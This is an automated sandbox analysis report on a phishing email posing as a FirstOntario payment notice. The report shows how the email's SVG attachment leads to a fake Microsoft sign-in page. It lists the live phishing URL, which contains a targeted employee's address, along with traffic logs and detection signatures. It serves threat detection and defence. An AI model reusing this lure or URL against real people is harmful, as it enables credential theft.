Edit tour

Windows Analysis Report
b10ad005.eml

Overview

General Information

Sample name:b10ad005.eml
renamed because original name is a hash value
Original sample name:New payment scheduled for firstontario.com will arrive your bank in 2-3 business days ref 3c6b1059512ad4105ee797a7b10ad005.eml
Analysis ID:1647197
MD5:6087cdabe6e2788eefc3ccbeb2a05a8c
SHA1:fbba72a9c2ceb05d250310e0e0643189f98da561
SHA256:0899f0bfb756bca08acea05dd98ddc70e586345aee462eb21ffa744e9228661b
Infos:

Detection

HTMLPhisher
Score:88
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Multi AV Scanner detection for submitted file
Yara detected HtmlPhish10
Yara detected Phisher
AI detected suspicious Javascript
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Stores large binary data to the registry

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6840 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\b10ad005.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 4000 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3D9F5170-6583-4C56-AE69-041DCE400F73" "5FB1A8F6-43EA-4D94-9C18-97D88016F238" "6840" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 2216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\AUF9XAMG\ATT35822.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1996,i,6430514035863861534,16728946172198175755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.1.d.script.csvJoeSecurity_Phisher_3Yara detected PhisherJoe Security
    1.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: b10ad005.emlVirustotal: Detection: 14%Perma Link

      Phishing

      barindex
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comJoe Sandbox AI: Score: 9 Reasons: The brand 'FirstOntario' is a known credit union in Canada, and its legitimate domain is 'firstontario.com'., The URL 'jsyk.investigation.it.com' does not match the legitimate domain of FirstOntario., The domain 'it.com' is a generic domain and not associated with FirstOntario., The presence of 'investigation' and 'jsyk' in the URL is suspicious and not typical for a financial institution's domain., The use of a password input field on a non-legitimate domain is a common phishing tactic. DOM: 1.5.pages.csv
      Source: Yara matchFile source: 1.5.pages.csv, type: HTML
      Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
      Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/AppData/Local/Microsoft/Wind... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code and URLs. The script appears to be redirecting the user to a suspicious domain, which is a strong indicator of malicious intent. Additionally, the script uses a combination of base64 encoding and function calls to conceal its true purpose, further increasing the risk score.
      Source: EmailJoe Sandbox AI: Detected potential phishing email: Subject line contains suspicious reference number and awkward phrasing ('will arrive your bank'). Sender domain (futuresrehab.com) doesn't match the referenced financial institution (firstontario.com). SVG attachment is a red flag as it's commonly used in phishing attacks to deliver malicious code
      Source: EmailJoe Sandbox AI: Detected suspicious elements in Email header: Suspicious localhost [127.0.0.1] origin combined with external IP (216.155.139.132) indicates potential header manipulation or spoofing. Unusual boundary string format with random characters suggests possible malicious intent. Message appears to be sent through Microsoft Exchange protection but originates from localhost, which is highly unusual. No authentication results (SPF, DKIM, DMARC) provided despite going through Exchange Online Protection. Combination of localhost origin and external sending IP is a strong indicator of potential malicious activity
      Source: Chrome DOM: 1.3OCR Text: Microsoft Verifying safe browsing conditions. Verifying... CLOUDFLARE Your connection must be checked by Microsoft for security reasons before continuing.
      Source: Chrome DOM: 1.2OCR Text: Microsoft Verifying safe browsing conditions. Verifying.. CLOUDFLARE Your connection must be checked by Microsoft for security reasons before continuing.
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: Number of links: 0
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: Title: Sign in to your account does not match URL
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: Invalid link: Privacy statement
      Source: EmailClassification: Credential Stealer
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: <input type="password" .../> found
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: No favicon
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: No favicon
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: No favicon
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: No favicon
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: No <meta name="author".. found
      Source: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comHTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
      Source: unknownHTTPS traffic detected: 104.21.70.101:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.70.101:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.72.100:443 -> 192.168.2.16:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 43.128.240.50:443 -> 192.168.2.16:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.70.101:443 -> 192.168.2.16:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.201.1:443 -> 192.168.2.16:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.202.1:443 -> 192.168.2.16:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.222.215:443 -> 192.168.2.16:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49776 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 6MB later: 34MB
      Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
      Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.195
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.69.3
      Source: global trafficHTTP traffic detected: GET /xPCgk?e=aireland@firstontario.com HTTP/1.1Host: jsyk.investigation.it.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /xPCgk/?e=aireland@firstontario.com HTTP/1.1Host: jsyk.investigation.it.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/d3y8w/0x4AAAAAABBl2YxAEq84JTEp/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=925700ed3c157cf4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/d3y8w/0x4AAAAAABBl2YxAEq84JTEp/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/d3y8w/0x4AAAAAABBl2YxAEq84JTEp/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jsyk.investigation.it.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jsyk.investigation.it.com/xPCgk/?e=aireland@firstontario.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=2p3m219vl3ea48ua5ci3hbaebd
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1933918720:1742826586:M1neeQixT5o-O2WYep9BpiDi-N7t3T4n4M4Z0q0yLu8/925700ed3c157cf4/Aa8xZkLr7lODdm1227JieZvgJpZsFrHNls_7mFyimtU-1742828064-1.1.1.1-xV9DRF1xYkkl.mo8zEpuRWTpPhQxKs3HtQWnunCil66kHdy4FFORzmR1dP.zIHnw HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/925700ed3c157cf4/1742828066067/2zTuo4ar0R_ZAnI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/d3y8w/0x4AAAAAABBl2YxAEq84JTEp/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/925700ed3c157cf4/1742828066067/2zTuo4ar0R_ZAnI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/925700ed3c157cf4/1742828066068/9d3b3e9fdee7fbc9654555c56219c9953b3960b1aec63dbd0ce515de65e14e96/YqTRM7KYvQuxSRa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/d3y8w/0x4AAAAAABBl2YxAEq84JTEp/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1933918720:1742826586:M1neeQixT5o-O2WYep9BpiDi-N7t3T4n4M4Z0q0yLu8/925700ed3c157cf4/Aa8xZkLr7lODdm1227JieZvgJpZsFrHNls_7mFyimtU-1742828064-1.1.1.1-xV9DRF1xYkkl.mo8zEpuRWTpPhQxKs3HtQWnunCil66kHdy4FFORzmR1dP.zIHnw HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1933918720:1742826586:M1neeQixT5o-O2WYep9BpiDi-N7t3T4n4M4Z0q0yLu8/925700ed3c157cf4/Aa8xZkLr7lODdm1227JieZvgJpZsFrHNls_7mFyimtU-1742828064-1.1.1.1-xV9DRF1xYkkl.mo8zEpuRWTpPhQxKs3HtQWnunCil66kHdy4FFORzmR1dP.zIHnw HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://jsyk.investigation.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://jsyk.investigation.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://jsyk.investigation.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://jsyk.investigation.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
